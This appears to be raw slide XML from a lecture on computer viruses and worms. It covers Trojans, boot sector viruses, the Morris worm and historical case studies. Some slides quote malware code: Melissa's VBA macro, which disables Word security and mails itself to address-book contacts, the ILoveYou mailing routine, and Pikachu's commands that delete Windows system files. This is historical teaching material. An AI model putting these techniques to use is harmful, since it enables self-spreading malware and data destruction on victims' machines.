                    <a:pt x="73" y="4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6357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Freeform 24"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4338" y="1627"/>
              <a:ext cx="18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0" y="2"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="13" y="3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="17" y="5"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="21" y="7"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="27" y="9"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="29" y="11"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="32" y="17"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="34" y="21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32" y="43"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="29" y="49"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="23" y="53"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="19" y="57"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="15" y="61"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="8" y="64"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="4" y="66"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="4" y="64"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="6" y="64"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="8" y="59"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="12" y="55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5" y="36"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="15" y="30"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="13" y="24"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="13" y="19"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="10" y="13"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="8" y="9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66">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2" y="0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7" y="5"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21" y="7"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27" y="9"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29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6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29" y="49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5" y="61"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8" y="64"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4" y="66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8" y="59"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12" y="55"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13" y="49"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13" y="43"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15" y="36"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13" y="24"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13" y="19"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10" y="13"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8" y="9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BFE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74FC-7DA5-4954-8562-A7FFA3F8BE75}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>11</a:t>
            </a:fld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Bomb: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 Bomb:  A logic bomb executes when specific conditions occur. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Triggers for logic bombs can include change in a file, by a particular series of keystrokes, or at a specific time or date. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="80900" name="Picture 4" descr="j01992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"/>
            <a:ext cx="1828800" cy="172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5E6D-EA70-4147-ABCA-82AD7D4629A2}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>12</a:t>
            </a:fld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Trapdoor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Trapdoors  allow access to a system by skipping the usual login routine.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Overall goal of rootkits: install trapdoors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9903-E2A0-45E5-8BC5-1049C14E08AC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Macro Virus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Sometimes considered a worm.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>Requires a host program to process/run it. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>Written in Visual Basic for Application for Word, Access, Excel, PowerPoint, and Outlook etc.  E.g., Melissa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D515-A6F4-427C-A760-3D5F6025991A}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>14</a:t>
            </a:fld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Original Trojan Horse</a:t>
            </a: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Trojan horses are named after Homer’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" i="1">
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>Iliad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800">
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t> story of Greeks gifting a huge wooden horse to Troy that housed soldiers who emerged in the night and attacked the city.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="89092" name="Picture 4" descr="bd04940_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26000" y="2143125"/>
            <a:ext cx="3681413" cy="3443288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7400-40C7-4D2F-A399-616DB72E81CD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Trojan Horses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altLang="zh-TW" sz="2800" i="1" dirty="0">
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>Trojan horses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0">
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t> are programs that appear to have one function but actually perform another function. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0">
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>Modern-day Trojan horses resemble a program that the user wishes to run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0">
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>-- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0">
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>a game, a spreadsheet, or an editor. While the program appears to be doing what the user wants, it is also doing something else unrelated to its advertised purpose, and without the user's knowledge.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845A-FB65-4424-8739-5176C692F9EC}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>16</a:t>
            </a:fld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Types of Propagation</a:t>
            </a:r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Parasitic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Propagates by being a parasite on other files.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Attaching itself  in some manner that still leaves the original file usable.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.com  and .exe files of MS-DOS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Macro virus</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800">
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>Boot sector infectors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Copy themselves to the bootable portion of the hard (or floppy) disk.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The virus gains control when the system is booted.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="20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2BD4-9284-43BE-BCF2-9BC89DD8C455}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>17</a:t>
            </a:fld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Normal boot procedure of a PC</a:t>
            </a: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POST (Power On Self Test)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BIOS (Basic Input/Output System) discovers bootable devices, reads the boot sector from such a device, and passes control to it.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Bootable hard disks contain a Master Boot Record (MBR).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Chunk of code at the beginning of the hard drive.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Also contains the partition table.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The MBR code will look for a particular partition that is marked bootable (MSDOS fdisk: active), and then transfer control to the code.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E593-31E7-499F-A94E-C40285E524A7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Boot sector viruses</a:t>
            </a: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Insert themselves into the boot sector area.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>When the system boots, they can “do their thing,” and then transfer control the the relocated code that they replaced.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87A-31D5-493F-ABDD-0E5F95CE5262}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>19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Multi-partite Viruses</a:t>
            </a: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Refers to viruses that can use multiple means of infection, such as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MBR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Boot sector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Parasitic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39C-FD08-40D8-A5ED-525F7EA29E87}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1331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Awareness</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="133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Virus Bulletin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http://www.virusbtn.com/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Technical journal on developments in the field of computer viruses and anti-virus products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Virus Map, Calendar , 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http://home.mcafee.com/VirusInfo/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PC Viruses In-the-Wild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Viruses found spreading in the real world. Free of charge, to offset the 'numbers games' played antivirus product developers.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a virus to be considered In the Wild, it must be spreading as a result of normal day-to-day operations on and between the computers of unsuspecting users.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http://www.wildlist.org/WildList/201004.htm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2A49-974E-4C96-9DFB-0A646336ED98}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>20</a:t>
            </a:fld>
            <a:endParaRPr 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Payload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itchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>Refers to what the virus does (besides propagation) once executed.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Do nothing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Do cute things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Malicious damage (such as delete your partition table).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itchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>Some viruses have a particular trigger.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Date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Number of successful infections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Smart viruses use an infrequent trigger so that they have time to ensure they have propagated, before the users get alerted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78F4-CF63-4CF7-84CD-9D8D95B98EF2}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>21</a:t>
            </a:fld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Morris 1988 Internet Worm</a:t>
            </a:r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Robert Morris in Nov. 1988 used four methods to gain access to computers on the net.  One of them involved a buffer overflow attack on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" err="1"/>
              <a:t>fingerd</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Invoking </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t>finger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> with the appropriate string, the worm could make the daemon at a remote site have a buffer overflow and execute code that gave the worm access to the remote system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Once the worm gained access to a system, it would replicate itself and consume virtually all of the machine’s computing resources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Hundreds of machines on the net were paralyzed until security experts figured out how to kill the worm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Morris turned himself in, was prosecuted and sentenced to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3 years probation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400 hours of community service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$10,500 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>fine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(Incidentally, Morris is now a professor at MIT.)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hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://en.wikipedia.org/wiki/Morris_worm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79C3-D180-4BBA-87FF-EA7394BE2A8D}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="84994" name="Picture 2" descr="pikach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6783388" cy="2024063"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8501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Pikachu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Worm 2000</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="85012" name="Rectangle 2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Accesses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Outlook Address Book. Requires Visual Basic 6 runtime. Sends messages with its body attached to everyone in this address book.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The worm is attached to the message as PIKACHUPOKEMON.EXE.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Overwrites the AUTOEXEC.BAT file with the following:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>@ECHO OFF </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>del C:\WINDOWS\*.* </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>del C:\WINDOWS\SYSTEM\*.*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Melissa </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>Worm 1999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8924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CERT® Advisory CA-1999-04. March 26, 1999.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Infected more than one million personal computers in North America.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Caused more than $80 million in damage.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Infects NORMAL.DOT, and will infect all documents thereafter.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The macro is "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1"/>
              <a:t>Document_Close</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>()" so that any document that is worked on will be infected when it is closed.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When a document is infected the macro inserted is "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1"/>
              <a:t>Document_Open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>()" so that the macro runs when the document is opened.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David L. Smith, 31, of Aberdeen Township, NJ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/>
              <a:t>Pleads Guilty.   The state will recommended a sentence of 10 years, which is the maximum sentence provided by law.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000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Jailed for 20 months</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t> and imposed a $5,000 fine. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>May 2, 2002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D440-9688-423B-8963-1133415D0FC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E5D2-4B76-4F99-8855-AB0EFD3CFA02}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>24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Melissa </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>Worm</a:t>
            </a:r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Disables the macro security features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2743200"/>
            <a:ext cx="8277225" cy="2441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If System.PrivateProfileString("", "HKEY_CURRENT_USER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\Software\Microsoft\Office\9.0\Word\Security", "Level") &lt;&gt; "" Then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 CommandBars("Macro").Controls("Security...").Enabled = False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 System.PrivateProfileString("", "HKEY_CURRENT_USER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\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&amp;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Else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p$ = "clone"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CommandBars("Tools").Controls("Macro").Enabled = False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Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1):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   Options.SaveNormalPrompt = (1 - 1) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="1400">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>End If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18EB-08C1-4713-9A19-B9B641D10584}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>25</a:t>
            </a:fld>
            <a:endParaRPr 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MAPI stands for “Messaging API”, a way for Windows applications to interface with various e-mail functionalities.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  Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" sz="200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Set UngaDasOutlook = CreateObject("Outlook.Application") </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" sz="200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Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2000">
              <a:latin typeface="Lucida Console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A way to tell if it has already infected the host.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Lucida Console" pitchFamily="49" charset="0"/>
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>  If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "&lt;B style="color:black;background-color:#ffff66"&gt; Melissa&lt;/B&gt;?") &lt;&gt; "... by Kwyjibo" Then</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="200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968D-8FFF-4FDB-8185-D7D6E1BC8187}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>26</a:t>
            </a:fld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>
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>Check if the application is Outlook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新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>Compose of a list of the first 50 email addresses from the address book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	If UngaDasOutlook = "Outlook"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DasMapiName.Logon "profile", "password"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For y = 1 To DasMapiName.AddressLists.Count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Set AddyBook = DasMapiName.AddressLists(y)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x = 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Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)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For oo = 1 To AddyBook.AddressEntries.Count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Peep = AddyBook.AddressEntries(x)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BreakUmOffASlice.Recipients.Add Peep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x = x + 1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    If x &gt; 50 Then oo = 				       		AddyBook.AddressEntries.Count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800">
                <a:effectLst/>
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>        Next oo </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1800">
              <a:effectLst/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DE2-DD7F-4BE8-93E9-A505AF28C071}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>27</a:t>
            </a:fld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400">
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>Actually send emails</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400">
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
            </a:b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BreakUmOffASlice.Subject = "Important Message From " &amp; Application.UserName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BreakUmOffASlice.Body = </a:t>
            </a:r>
            <a:b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</a:b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"Here is that document you asked for ...                                               	don't show anyone else ;-)"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BreakUmOffASlice.Attachments.Add ActiveDocument.FullName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BreakUmOffASlice.Send</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="1400">
                <a:effectLst/>
                <a:ea typeface="新細明體" pitchFamily="18" charset="-12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4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400">
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>Wrap up</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400">
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
            </a:b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Peep = ""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Next y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DasMapiName.Logoff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End If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p$ = "clone"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System.PrivateProfileString("", "HKEY_CURRENT_USER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  \Software\Microsoft\Office\", "&lt;B style=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  "color:black;background-color:#ffff66"&gt;Melissa&lt;/B&gt;?") = "... by Kwyjibo"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TW" sz="1400">
                <a:effectLst/>
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>	End If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effectLst/>
              <a:latin typeface="Lucida Console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zh-TW" altLang="en-US" sz="14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99AB-91E0-4A6A-97E3-0D74DFE4494B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Melissa Worm</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)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Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)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NTCL = NTI1.CodeModule.CountOfLines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ADCL = ADI1.CodeModule.CountOfLines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BGN = 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ADI1.Name &lt;&gt; "&lt;B style="color:black;background-color:#ffff66"&gt;Melissa&lt;/B&gt;"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ADCL &gt; 0 Then _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ADI1.CodeModule.DeleteLines 1, ADCL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Set ToInfect = ADI1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ADI1.Name = "&lt;B style="color:black;background-color:#ffff66"&gt;Melissa&lt;/B&gt;"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DoAD = True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End If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NTI1.Name &lt;&gt; "&lt;B style="color:black;background-color:#ffff66"&gt;Melissa&lt;/B&gt;"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If NTCL &gt; 0 Then _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NTI1.CodeModule.DeleteLines 1, NTCL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Set ToInfect = NTI1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NTI1.Name = "&lt;B style="color:black;background-color:#ffff66"&gt;Melissa&lt;/B&gt;"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	DoNT = True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	End If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200">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>If DoNT &lt;&gt; True And DoAD &lt;&gt; True Then GoTo CYA</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1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ILoveYou</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>worm 2000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CERT® Advisory CA-2000-04 Love Letter Worm  May 4, 2000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>An attachment named "LOVE-LETTER-FOR-YOU.TXT.VBS" </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>A subject of "ILOVEYOU" </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>The body of the message reads "kindly check the attached LOVELETTER coming from me." </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>This 328-line program caused (by some estimates) ~$10B in damage. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>How much work and smarts was required?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334F-3724-47F1-98FB-942FB1CC343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4DE4-9A22-46DA-9280-2DABAEFA7FD3}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="138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 in Computer Virology </a:t>
            </a:r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Publisher: Springer Paris</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>ISSN</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>1772-9890 (Print) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>1772-9904 (Online)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Volume 6, 2010 Selected Articles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>A general definition of malware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Identification of file infecting viruses through detection of self-reference replication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Analysis of a scanning model of worm propagation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Volume </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>4, 2008 Selected Articles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>Rootkit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t> modeling and experiments under Linux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6"/>
              </a:rPr>
              <a:t>Advances in password cracking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7"/>
              </a:rPr>
              <a:t>Discovering and exploiting 802.11 wireless driver vulnerabilities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9-53AD-46F7-8167-583D4F9A3ECB}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>30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ILoveYou Excerpt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rem  barok -loveletter(vbe) &lt;i hate go to school&gt;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rem by: spyder  /  ispyder@mail.com  /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	@GRAMMERSoft Group  / Manila,Philippines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...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sub spreadtoemail()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for ctrlists=1 to mapi.AddressLists.Count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set a=mapi.AddressLists(ctrlists)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x=1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	 for ctrentries=1 to a.AddressEntries.Count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malead=a.AddressEntries(x)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	   set male=out.CreateItem(0)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male.Recipients.Add(malead)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male.Subject = “ILOVEYOU”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male.Body = “kindly check the attached LOVELETTER coming ..”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male.Attachments.Add(dirsystem&amp;“\LOVE-LETTER-FOR-YOU.TXT.vbs”)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 male.Send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	   x=x+1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 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end sub</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="160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8CFE-767C-49A2-B449-A9861060256E}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>31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Anatomy of a Virus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Two primary components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Propagation mechanism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Payload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>Propagation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Method by which the virus spreads itself.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>Old days: single PC, transferred to other hosts by ways of floppy diskettes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>Nowadays: Internet.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1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D3C8-A299-4E1F-B768-F7665F2CCC23}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>32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Virus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71600" y="1676400"/>
            <a:ext cx="6600825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Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Virus() {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  infectExecutable();</a:t>
            </a:r>
          </a:p>
          <a:p>
